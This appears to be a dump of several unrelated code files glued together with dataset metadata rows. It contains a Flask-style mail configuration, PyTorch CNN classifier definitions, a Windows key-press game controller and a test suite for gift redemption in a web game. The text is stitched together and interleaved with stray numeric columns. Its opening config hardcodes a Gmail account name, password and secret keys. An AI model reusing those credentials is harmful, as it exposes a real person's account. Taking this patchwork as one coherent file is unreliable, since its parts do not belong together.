    SECRET_KEY = 'SECRET_KEY_NGHI_ABC!123'
    SECURITY_PASSWORD_SALT = 'SECURITY_PASSWORD_SALT_NGHI_ABC!123'
    MAIL_DEFAULT_SENDER = 'dev2020@localhost'
    MAIL_SERVER = 'smtp.gmail.com'
    # Port 465 with SSL (TLS off, SSL on below).
    MAIL_PORT = 465
    MAIL_USERNAME = 'nghidev2020@gmail.com'
    MAIL_PASSWORD = 'nghi1996'
    MAIL_USE_TLS = False
    MAIL_USE_SSL = True
    # Relative directory used for uploaded image files.
    UPLOAD_FOLDER = 'images'
| 30.977273
| 84
| 0.730007
| 169
| 1,363
| 5.526627
| 0.295858
| 0.057816
| 0.042827
| 0.099572
| 0.797645
| 0.755889
| 0.755889
| 0.755889
| 0.755889
| 0.618844
| 0
| 0.053812
| 0.181952
| 1,363
| 43
| 85
| 31.697674
| 0.783857
| 0.094644
| 0
| 0.685714
| 0
| 0
| 0.284322
| 0.164907
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.114286
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
30c431499dc4bcd6bf5914680a8fce4d549de942
| 11,016
|
py
|
Python
|
architecture.py
|
tranic/histopathology_cancer_detection
|
6e9916cd73ebf8a5a1dfefe6f6c203a8e760c2db
|
[
"MIT"
] | 4
|
2020-08-14T14:48:27.000Z
|
2021-06-15T17:01:34.000Z
|
architecture.py
|
tranic/dl_histopathology_cancer_detection
|
771932bfd4a0db2af733fe25953af324bc83771b
|
[
"MIT"
] | 3
|
2020-07-21T19:24:45.000Z
|
2020-07-24T12:09:14.000Z
|
architecture.py
|
tranic/histopathology_cancer_detection
|
6e9916cd73ebf8a5a1dfefe6f6c203a8e760c2db
|
[
"MIT"
] | null | null | null |
from torch import nn
from torchvision import models
import torch
"""
This file contains all CNN architectures as classes (non-pretrained and pretrained) inheriting from torch.nn.Module.
"""
class LeNet(nn.Module):
    """LeNet-style CNN for 3x96x96 inputs producing a single logit.

    Input is reshaped to (-1, 3, 96, 96); after two conv+pool stages the
    feature map is 16x22x22, which feeds the fully-connected head.
    """
    def __init__(self):
        super(LeNet, self).__init__()
        # Construction order is kept identical to preserve parameter order.
        self.ReLu = nn.ReLU(inplace=True)
        self.flatten = nn.Flatten()
        self.conv2d_0 = nn.Conv2d(3, 6, kernel_size=5, padding=2)
        self.pool_1 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.conv2d_2 = nn.Conv2d(6, 16, kernel_size=5)
        self.pool_3 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.linear_4 = nn.Linear(16 * 22 * 22, 120)
        self.linear_5 = nn.Linear(120, 10)
        # Final projection down to one logit.
        self.output = nn.Linear(10, 1)

    def forward(self, X, **kwargs):
        out = X.view(-1, 3, 96, 96).float()
        out = self.pool_1(self.ReLu(self.conv2d_0(out)))
        out = self.pool_3(self.ReLu(self.conv2d_2(out)))
        out = self.flatten(out)
        out = self.ReLu(self.linear_4(out))
        out = self.ReLu(self.linear_5(out))
        return self.output(out)
class DenseNet121(nn.Module):
    """DenseNet-121 (random init) with a small single-logit classifier head."""
    def __init__(self):
        super(DenseNet121, self).__init__()
        base_net = models.densenet121(pretrained=False)
        self.features = base_net.features
        self.dense121_relu = nn.ReLU(inplace=True)
        self.dense121_pool = nn.AdaptiveAvgPool2d((1, 1))
        # Head: 1024 feature channels -> 512 -> 1 logit.
        self.classifier = nn.Sequential(nn.Linear(1024, 512),
                                        nn.Dropout(p=0.1),
                                        nn.ReLU(),
                                        nn.Linear(512, 1))
        del base_net

    def forward(self, X):
        out = self.features(X.view(-1, 3, 96, 96).float())
        # ReLU + global average pool bridge the backbone to the linear head.
        out = self.dense121_pool(self.dense121_relu(out))
        return self.classifier(torch.flatten(out, 1))
class DenseNet121Pretrained(nn.Module):
    """ImageNet-pretrained DenseNet-121; only the last four dense layers of
    denseblock4 and the new classifier head are trainable."""
    def __init__(self):
        super(DenseNet121Pretrained, self).__init__()
        base_net = models.densenet121(pretrained=True)
        self.features = base_net.features
        self.dense121_relu = nn.ReLU(inplace=True)
        self.dense121_pool = nn.AdaptiveAvgPool2d((1, 1))
        # Freeze the whole backbone, then re-enable the final dense layers.
        for param in self.features.parameters():
            param.requires_grad = False  # default is True for all
        for layer_name in ("denselayer13", "denselayer14",
                           "denselayer15", "denselayer16"):
            for param in getattr(self.features.denseblock4, layer_name).parameters():
                param.requires_grad = True
        # Head: 1024 feature channels -> 512 -> 1 logit.
        self.classifier = nn.Sequential(nn.Linear(1024, 512),
                                        nn.Dropout(p=0.1),
                                        nn.ReLU(),
                                        nn.Linear(512, 1))
        del base_net

    def forward(self, X):
        out = self.features(X.view(-1, 3, 224, 224).float())
        out = self.dense121_pool(self.dense121_relu(out))
        return self.classifier(torch.flatten(out, 1))
class DenseNet201(nn.Module):
    """DenseNet-201 (random init) with a small single-logit classifier head."""
    def __init__(self):
        super(DenseNet201, self).__init__()
        base_net = models.densenet201(pretrained=False)
        self.features = base_net.features
        self.dense201_relu = nn.ReLU(inplace=True)
        self.dense201_pool = nn.AdaptiveAvgPool2d((1, 1))
        # Head: 1920 feature channels -> 512 -> 1 logit.
        self.classifier = nn.Sequential(nn.Linear(1920, 512),
                                        nn.Dropout(p=0.1),
                                        nn.ReLU(),
                                        nn.Linear(512, 1))
        del base_net

    def forward(self, X):
        out = self.features(X.view(-1, 3, 96, 96).float())
        out = self.dense201_pool(self.dense201_relu(out))
        return self.classifier(torch.flatten(out, 1))
class DenseNet201Pretrained(nn.Module):
    """ImageNet-pretrained DenseNet-201; only the last four dense layers of
    denseblock4 and the new classifier head are trainable."""
    def __init__(self):
        super(DenseNet201Pretrained, self).__init__()
        base_net = models.densenet201(pretrained=True)
        self.features = base_net.features
        self.dense201_relu = nn.ReLU(inplace=True)
        self.dense201_pool = nn.AdaptiveAvgPool2d((1, 1))
        # Freeze the whole backbone, then re-enable the final dense layers.
        for param in self.features.parameters():
            param.requires_grad = False  # default is True for all
        for layer_name in ("denselayer29", "denselayer30",
                           "denselayer31", "denselayer32"):
            for param in getattr(self.features.denseblock4, layer_name).parameters():
                param.requires_grad = True
        # Head: 1920 feature channels -> 512 -> 1 logit.
        self.classifier = nn.Sequential(nn.Linear(1920, 512),
                                        nn.Dropout(p=0.1),
                                        nn.ReLU(),
                                        nn.Linear(512, 1))
        del base_net

    def forward(self, X):
        out = self.features(X.view(-1, 3, 224, 224).float())
        out = self.dense201_pool(self.dense201_relu(out))
        return self.classifier(torch.flatten(out, 1))
class ResNet18_96(nn.Module):
    """ResNet-18 (random init) for 96x96 inputs with a single-logit head."""
    def __init__(self):
        super(ResNet18_96, self).__init__()
        self.model = models.resnet18(pretrained=False)
        # Swap the final fc layer for binary (single-logit) classification.
        in_features = self.model.fc.in_features
        self.model.fc = nn.Sequential(
            nn.Dropout(0.5),
            nn.Linear(in_features, 1)
        )

    def forward(self, X):
        return self.model(X.view(-1, 3, 96, 96).float())
class ResNet152_96(nn.Module):
    """ResNet-152 for 96x96 inputs with a single-logit classification head.

    Args:
        pretrained: when True, load ImageNet weights and freeze everything
            except ``layer3``, ``layer4`` and the replacement fc head.
    """
    def __init__(self, pretrained=False):
        super(ResNet152_96, self).__init__()
        self.model = models.resnet152(pretrained=pretrained)
        # (Removed a leftover debug print of the `pretrained` flag.)
        if pretrained:
            # We only want to train the last 2 multilayers (layer3 and layer4).
            for param in self.model.parameters():
                param.requires_grad = False  # as default is True for all
            for layer in (self.model.layer3, self.model.layer4):
                for param in layer.parameters():
                    param.requires_grad = True
        # Change last layer (fc) to adjust for binary classification.
        n_features_in = self.model.fc.in_features
        self.model.fc = nn.Sequential(
            nn.Dropout(0.5),
            nn.Linear(n_features_in, 1)
        )

    def forward(self, X):
        X = X.view(-1, 3, 96, 96).float()
        return self.model(X)
class ResNet34Pretrained(nn.Module):
    """ImageNet-pretrained ResNet-34; only layer3, layer4 and the new single-
    logit head are trainable."""
    def __init__(self):
        super(ResNet34Pretrained, self).__init__()
        self.model = models.resnet34(pretrained=True)
        # Freeze everything, then unfreeze the last two multilayers.
        for param in self.model.parameters():
            param.requires_grad = False  # default is True for all
        for layer in (self.model.layer3, self.model.layer4):
            for param in layer.parameters():
                param.requires_grad = True
        # Swap the final fc layer for binary (single-logit) classification.
        in_features = self.model.fc.in_features
        self.model.fc = nn.Sequential(
            nn.Dropout(0.5),
            nn.Linear(in_features, 1)
        )

    def forward(self, X):
        return self.model(X.view(-1, 3, 224, 224).float())
class ResNet152Pretrained(nn.Module):
    """ImageNet-pretrained ResNet-152; only layer3, layer4 and the new single-
    logit head are trainable."""
    def __init__(self):
        super(ResNet152Pretrained, self).__init__()
        self.model = models.resnet152(pretrained=True)
        # Freeze everything, then unfreeze the last two multilayers.
        for param in self.model.parameters():
            param.requires_grad = False  # default is True for all
        for layer in (self.model.layer3, self.model.layer4):
            for param in layer.parameters():
                param.requires_grad = True
        # Swap the final fc layer for binary (single-logit) classification.
        in_features = self.model.fc.in_features
        self.model.fc = nn.Sequential(
            nn.Dropout(0.5),
            nn.Linear(in_features, 1)
        )

    def forward(self, X):
        return self.model(X.view(-1, 3, 224, 224).float())
class VGG11(nn.Module):
    """VGG-11 (random init) whose classifier ends in a single logit."""
    def __init__(self):
        super(VGG11, self).__init__()
        base_net = models.vgg11(pretrained=False)
        self.features = base_net.features
        self.avgpool = base_net.avgpool
        # Stock VGG classifier layout, but the final Linear outputs 1 logit.
        self.classifier = nn.Sequential(
            nn.Linear(in_features=25088, out_features=4096, bias=True),
            nn.ReLU(inplace=True),
            nn.Dropout(p=0.5, inplace=False),
            nn.Linear(in_features=4096, out_features=4096, bias=True),
            nn.ReLU(inplace=True),
            nn.Dropout(p=0.5, inplace=False),
            nn.Linear(in_features=4096, out_features=1, bias=True)
        )
        del base_net

    def forward(self, X):
        out = self.avgpool(self.features(X.view(-1, 3, 96, 96).float()))
        return self.classifier(torch.flatten(out, 1))
class VGG19(nn.Module):
    """VGG-19 (random init) whose classifier ends in a single logit."""
    def __init__(self):
        super(VGG19, self).__init__()
        base_net = models.vgg19(pretrained=False)
        self.features = base_net.features
        self.avgpool = base_net.avgpool
        # Stock VGG classifier layout, but the final Linear outputs 1 logit.
        self.classifier = nn.Sequential(
            nn.Linear(in_features=25088, out_features=4096, bias=True),
            nn.ReLU(inplace=True),
            nn.Dropout(p=0.5, inplace=False),
            nn.Linear(in_features=4096, out_features=4096, bias=True),
            nn.ReLU(inplace=True),
            nn.Dropout(p=0.5, inplace=False),
            nn.Linear(in_features=4096, out_features=1, bias=True)
        )
        del base_net

    def forward(self, X):
        out = self.avgpool(self.features(X.view(-1, 3, 96, 96).float()))
        return self.classifier(torch.flatten(out, 1))
| 29.853659
| 116
| 0.575345
| 1,411
| 11,016
| 4.35365
| 0.100638
| 0.014
| 0.03093
| 0.043301
| 0.838515
| 0.819795
| 0.762006
| 0.729123
| 0.708937
| 0.708937
| 0
| 0.057222
| 0.31309
| 11,016
| 368
| 117
| 29.934783
| 0.754592
| 0.071169
| 0
| 0.713115
| 0
| 0
| 0.00109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090164
| false
| 0
| 0.012295
| 0
| 0.192623
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30c7911e775648584828421609b2ac504a7492e3
| 41
|
py
|
Python
|
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
decorators/__init__.py
|
jlorieau/useful_python
|
324fc2f5e93fa4aefeb420dbe7303c242818ccba
|
[
"MIT"
] | null | null | null |
from .weakref_props import weakref_props
| 20.5
| 40
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
30dd6de53706cad98b28e14d85d90f506b5fc13c
| 16,490
|
py
|
Python
|
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
extra/game-mdungeon.py
|
dpteam/twitch-plays
|
82becef76d7a8254bfde959946640457f4342fb3
|
[
"MIT"
] | null | null | null |
import win32api
import win32con
import time
class Game:
    """Button dispatcher for a Twitch-plays style emulator controller.

    Buttons come in three flavours, all listed in ``keymap``:
    - plain keys ('up', 'a', ...) mapped to their key codes;
    - chord buttons ('l+a', 'b+up', ...), listed with code 0x00 and handled
      specially by :meth:`push_button`;
    - repeat buttons ('up2'..'b9'), also listed with 0x00, meaning "press the
      base key N times".
    """
    keymap = {
        # Comment out any button(s) that would be unused
        'up': 0x30,
        'down': 0x31,
        'left': 0x32,
        'right': 0x33,
        'a': 0x34,
        'b': 0x35,
        'x': 0x36,
        'y': 0x37,
        'start': 0x38,
        'select': 0x39,
        'l': 0x41,
        'r': 0x42,
        # Chord buttons (dispatched specially; 0x00 is a placeholder code).
        'l+a': 0x00,
        'l+r': 0x00,
        'a+b': 0x00,
        'b+up': 0x00,
        'b+down': 0x00,
        'b+left': 0x00,
        'b+right': 0x00,
        'r+up': 0x00,
        'r+down': 0x00,
        'r+left': 0x00,
        'r+right': 0x00,
        'y+up': 0x00,
        'y+down': 0x00,
        'y+left': 0x00,
        'y+right': 0x00,
        'u+left': 0x00,
        'u+right': 0x00,
        'd+left': 0x00,
        'd+right': 0x00,
        # Repeat buttons (base key pressed 2-9 times).
        'up2': 0x00,
        'up3': 0x00,
        'up4': 0x00,
        'up5': 0x00,
        'up6': 0x00,
        'up7': 0x00,
        'up8': 0x00,
        'up9': 0x00,
        'down2': 0x00,
        'down3': 0x00,
        'down4': 0x00,
        'down5': 0x00,
        'down6': 0x00,
        'down7': 0x00,
        'down8': 0x00,
        'down9': 0x00,
        'left2': 0x00,
        'left3': 0x00,
        'left4': 0x00,
        'left5': 0x00,
        'left6': 0x00,
        'left7': 0x00,
        'left8': 0x00,
        'left9': 0x00,
        'right2': 0x00,
        'right3': 0x00,
        'right4': 0x00,
        'right5': 0x00,
        'right6': 0x00,
        'right7': 0x00,
        'right8': 0x00,
        'right9': 0x00,
        'a2': 0x00,
        'a3': 0x00,
        'a4': 0x00,
        'a5': 0x00,
        'a6': 0x00,
        'a7': 0x00,
        'a8': 0x00,
        'a9': 0x00,
        'b2': 0x00,
        'b3': 0x00,
        'b4': 0x00,
        'b5': 0x00,
        'b6': 0x00,
        'b7': 0x00,
        'b8': 0x00,
        'b9': 0x00
    }

    # Hold time (seconds) for an ordinary key press.
    _TAP = .15
    # Pause between repeated presses of the same key.
    _REPEAT_GAP = .5

    def get_valid_buttons(self):
        """Return the list of all recognized button names."""
        return list(self.keymap)

    def is_valid_button(self, button):
        """Return True when *button* is a recognized button name."""
        return button in self.keymap

    def button_to_key(self, button):
        """Map a button name to its key code (raises KeyError when unknown)."""
        return self.keymap[button]

    def _key_for(self, name):
        """Resolve a chord component to a key code.

        'u' and 'd' are shorthand for 'up'/'down' in combo names like 'u+left'.
        """
        aliases = {'u': 'up', 'd': 'down'}
        return self.keymap[aliases.get(name, name)]

    def _press(self, key, hold):
        """Press and release *key*, holding it for *hold* seconds."""
        win32api.keybd_event(key, 0, 0, 0)
        time.sleep(hold)
        win32api.keybd_event(key, 0, win32con.KEYEVENTF_KEYUP, 0)

    def _chord(self, key_a, key_b, hold):
        """Press two keys together, hold for *hold* seconds, release both."""
        win32api.keybd_event(key_a, 0, 0, 0)
        win32api.keybd_event(key_b, 0, 0, 0)
        time.sleep(hold)
        win32api.keybd_event(key_a, 0, win32con.KEYEVENTF_KEYUP, 0)
        win32api.keybd_event(key_b, 0, win32con.KEYEVENTF_KEYUP, 0)

    def push_button(self, button):
        """Dispatch *button*: a single key, a 'k1+k2' chord, or a repeat.

        Replaces the original ~450-line elif chain with a data-driven
        dispatch; timing is preserved (chords held .15 s, 'b+<direction>'
        chords held 3 s, repeats tapped .15 s with a .5 s gap). Unknown
        buttons raise KeyError, exactly as the old fall-through did.
        """
        # Chord/repeat buttons are the keymap entries listed with code 0x00.
        if button in self.keymap and self.keymap[button] == 0x00:
            if '+' in button:
                first, second = button.split('+', 1)
                # 'b+<direction>' chords are held for 3 s (the originals
                # slept 3 there); every other chord is held for .15 s.
                hold = 3 if first == 'b' else self._TAP
                self._chord(self._key_for(first), self._key_for(second), hold)
            else:
                # Repeat button, e.g. 'up3' == press 'up' three times.
                base, count = button[:-1], int(button[-1])
                key = self._key_for(base)
                for _ in range(count):
                    self._press(key, self._TAP)
                    time.sleep(self._REPEAT_GAP)
        else:
            # Plain single key (KeyError for unrecognized names).
            self._press(self.button_to_key(button), self._TAP)
| 29.499106
| 83
| 0.649363
| 2,460
| 16,490
| 4.242276
| 0.055285
| 0.21675
| 0.300115
| 0.19174
| 0.887792
| 0.885588
| 0.816405
| 0.811709
| 0.809218
| 0.790533
| 0
| 0.157807
| 0.197999
| 16,490
| 558
| 84
| 29.551971
| 0.631304
| 0.007216
| 0
| 0.702011
| 0
| 0
| 0.037148
| 0
| 0
| 0
| 0.061343
| 0
| 0
| 0
| null | null | 0
| 0.005484
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
30f9e09032e62f937d216a2289d92f6ff8e5c962
| 36,393
|
py
|
Python
|
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
tests/models/test_gifts.py
|
plastr/extrasolar-game
|
1aad5971556d498e3617afe75f27e2f4132d4668
|
[
"MIT",
"Unlicense"
] | null | null | null |
# Copyright (c) 2010-2011 Lazy 8 Studios, LLC.
# All rights reserved.
import re
from front.tests import base
from front.tests.base import PRODUCT_KEY_S1_GIFT, VOUCHER_KEY_S1_GIFT, PRODUCT_KEY_ALL_GIFT, VOUCHER_KEY_ALL_GIFT
from front.tests.base import PRODUCT_KEY_S1, PRODUCT_KEY_ALL, VOUCHER_KEY_ALL, VOUCHER_KEY_S1
from front.tests.base import INVITE_EMAIL, INVITE_FIRST_NAME, INVITE_LAST_NAME, INVITE_LAST_NAME_TRUNCATED
from front.tests.mock_stripe import ChargeAlwaysSuccess, FAKE_CHARGE_ID_1
from front import gift_types
from front.lib import db, urls
from front.models import chips
from front.backend import admin
class TestGifts(base.TestCase):
    """Integration tests for creating, purchasing, sending and redeeming gifts.

    Covers both admin-created gifts and gifts purchased through the shop,
    redemption by new and existing users, voucher delivery, chip emission,
    and the error paths (double redemption, already-owned vouchers).
    NOTE(review): Python 2 style code (`values()[0]`, `super(TestGifts, self)`);
    keep it that way for consistency with the rest of the suite.
    """

    def setUp(self):
        """Create and log in a default test user with no invites left."""
        super(TestGifts, self).setUp()
        self.create_user('testuser@example.com', 'pw')
        # Should always be able to send gifts even if there are no invites left.
        self.set_user_invites_left(0)
        # Advance time a few seconds to flush any chips.
        self.advance_now(seconds=5)

    def test_admin_gift_redeem_new(self):
        """An admin-created gift can be redeemed by signing up a brand-new user."""
        # Create an admin gift as the 'testuser@example.com' admin user.
        with db.commit_or_rollback(self.get_ctx()) as ctx:
            with db.conn(ctx) as ctx:
                admin_user = self.get_logged_in_user(ctx=ctx)
                self.make_user_admin(admin_user)
                gift = admin.create_admin_gift_of_type(ctx, admin_user, gift_types.GFT_S1_PASS, "Testing Gift")
        self.logout_user()
        # Redeem that admin gift for a new user.
        response = self.app.get(gift.url_gift_redeem())
        response = response.click(href=gift.url_gift_redeem_new_user())
        form = response.forms['form_signup']
        form['signup_email'].value = INVITE_EMAIL
        form['first_name'].value = INVITE_FIRST_NAME
        form['last_name'].value = INVITE_LAST_NAME
        form['signup_password'] = "pw"
        response = form.submit()
        # Should attempt to send to /
        response = response.follow()
        self.assertEqual(urls.root(), response.request.path)
        # And then redirect to root.
        response = response.follow()
        self.assertEqual(urls.auth_signup_complete(), response.request.path)
        self.assertTrue("No Available Rovers" in response)
        # Now validate the new user (who should still be logged in).
        validate_url = self.get_user_by_email(INVITE_EMAIL).url_validate()
        response = self.app.get(urls.root())
        response = self.app.get(validate_url)
        self.assertTrue("Account Authenticated" in response)
        response = self.app.get(urls.ops())
        self.assertEqual(urls.ops(), response.request.path)
        self.assert_logged_in(response)
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        vouchers = gamestate['user']['vouchers']
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        found_chips = self.chips_for_path(['user', 'vouchers', '*'])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.ADD)
        self.assertEqual(found_chips[0]['value']['voucher_key'], VOUCHER_KEY_S1_GIFT)
        # Verify that the product that delivers this voucher is no longer available for the recipient.
        self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
        self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
        found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'])
        self.assertEqual(len(found_chips), 0)
        found_chips = self.chips_for_path(['user', 'shop', 'available_products', PRODUCT_KEY_S1])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.DELETE)
        self.assertEqual(found_chips[0]['path'][-1], PRODUCT_KEY_S1)
        # Attempting to redeem the gift again should be an error.
        response = self.app.get(gift.url_gift_redeem())
        self.assertTrue('gift has already been redeemed' in response)
        self.assertTrue(gift.url_gift_redeem_new_user() not in response)
        response = self.app.get(gift.url_gift_redeem_new_user())
        self.assertTrue('gift has already been redeemed' in response)

    def test_admin_gift_redeem_existing(self):
        """An admin-created gift can be redeemed by an already-existing user.

        Also exercises the lazy-loaded fields on the GiftCreated/GiftRedeemed
        model objects before and after redemption.
        """
        # Create an admin gift as the 'testuser@example.com' admin user.
        with db.commit_or_rollback(self.get_ctx()) as ctx:
            with db.conn(ctx) as ctx:
                admin_user = self.get_logged_in_user(ctx=ctx)
                self.make_user_admin(admin_user)
                gift = admin.create_admin_gift_of_type(ctx, admin_user, gift_types.GFT_S1_PASS, "Testing Gift")
        # Check the lazy loaded fields for the GiftRedeemed subclass.
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        self.assertEqual(gift.creator.user_id, sender.user_id)
        self.assertIsNone(gift.redeemer)
        # Check the lazy loaded name and description.
        product = sender.shop.available_products[PRODUCT_KEY_S1]
        self.assertEqual(gift.name, product.name)
        self.assertEqual(gift.description, product.description)
        # Logout the admin user
        self.logout_user()
        # Create an existing user and login as them.
        self.create_user('existing@example.com', 'pw')
        response = self.app.get(gift.url_gift_redeem())
        response = response.click(href=gift.url_gift_redeem_existing_user())
        form = response.forms['form_login']
        form['login_email'].value = "existing@example.com"
        form['login_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        vouchers = gamestate['user']['vouchers']
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        found_chips = self.chips_for_path(['user', 'vouchers', '*'])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.ADD)
        self.assertEqual(found_chips[0]['value']['voucher_key'], VOUCHER_KEY_S1_GIFT)
        # Verify that the product that delivers this voucher is no longer available for the recipient.
        self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
        self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
        found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'])
        self.assertEqual(len(found_chips), 0)
        found_chips = self.chips_for_path(['user', 'shop', 'available_products', PRODUCT_KEY_S1])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.DELETE)
        self.assertEqual(found_chips[0]['path'][-1], PRODUCT_KEY_S1)
        # Attempting to redeem the gift again should be an error.
        response = self.app.get(gift.url_gift_redeem())
        self.assertTrue('gift has already been redeemed' in response)
        self.assertTrue(gift.url_gift_redeem_existing_user() not in response)
        response = self.app.get(gift.url_gift_redeem_existing_user())
        self.assertTrue('gift has already been redeemed' in response)
        # Check the lazy loaded fields for the GiftRedeemed subclass.
        redeemer = self.get_logged_in_user()
        self.assertEqual(len(redeemer.gifts_created), 0)
        self.assertEqual(len(redeemer.gifts_redeemed), 1)
        gift = redeemer.gifts_redeemed.values()[0]
        self.assertEqual(gift.creator.user_id, sender.user_id)
        self.assertEqual(gift.redeemer.user_id, redeemer.user_id)
        self.assertEqual(redeemer.campaign_name, "")
        # And check the lazy loaded fields for the GiftCreated now that they are all populated.
        self.logout_user()
        self.login_user("testuser@example.com", "pw")
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_redeemed), 0)
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        self.assertEqual(gift.creator.user_id, sender.user_id)
        self.assertEqual(gift.redeemer.user_id, redeemer.user_id)

    # Test buying a gift which sends an invitation and is redeemed by a new user.
    def test_buy_gift_with_invitation_new_user(self):
        """Purchase a gift, follow the emailed invite, and redeem as a new signup."""
        response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_last_name=INVITE_LAST_NAME)
        # Grab the post purchase gamestate.
        gamestate = self.get_gamestate()
        # A new purchased product of the expected type should exist.
        self.assertEqual(len(gamestate['user']['shop']['purchased_products']), 1)
        product = gamestate['user']['shop']['purchased_products'].values()[0]
        self.assertEqual(product['product_key'], PRODUCT_KEY_S1_GIFT)
        found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'], response)
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.ADD)
        self.assertEqual(found_chips[0]['value']['product_key'], PRODUCT_KEY_S1_GIFT)
        # An invitation should have been sent with a gift attached.
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        # Verify that the truncation code in the validation step worked.
        self.assertEqual(invitations.values()[0]['recipient_last_name'], INVITE_LAST_NAME_TRUNCATED)
        invite = invitations.values()[0]
        # The gift is not put into the gamestate so check the model object itself.
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_created), 1)
        self.assertEqual(len(sender.gifts_redeemed), 0)
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNone(invite_model.accepted_at)
        gift = invite_model.gift
        self.assertEqual(gift.creator_id, sender.user_id)
        self.assertFalse(gift.was_redeemed())
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Verify some of the expected data was inserted into the email body.
        self.assertEqual(INVITE_EMAIL, email.email_to)
        self.assertTrue(INVITE_FIRST_NAME in email.body_html)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender as we are creating a new user.
        self.logout_user()
        # Follow the accept invite URL as a not logged in user which should show a choice of whether
        # to redeem the gift for a new or existing user.
        response = self.app.get(invite_accept_url)
        # The inviters first name should be shown in the template to explain to the user who invited them.
        self.assertTrue(sender.first_name in response)
        # Select the redeem for new user option.
        response = response.click(href=gift.url_gift_redeem_new_user())
        # Assert the invite code is in the page.
        self.assertTrue('Invitation Code' in response)
        # And signup the user using the invite provided data and a user supplied password.
        form = response.forms['form_signup']
        # These fields should have been filled out.
        self.assertEqual(form['signup_email'].value, INVITE_EMAIL)
        self.assertEqual(form['first_name'].value, INVITE_FIRST_NAME)
        self.assertEqual(form['last_name'].value, INVITE_LAST_NAME_TRUNCATED)
        form['signup_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # The new user should redirect back to / and since they are not authorized (haven't followed the backdoor link),
        # they should see the rover program is full message.
        response = response.follow()
        self.assertEqual(urls.auth_signup_complete(), response.request.path)
        self.assertTrue('No Available Rovers' in response)
        # Verify the recipient was created but still has not validated.
        self.logout_user()
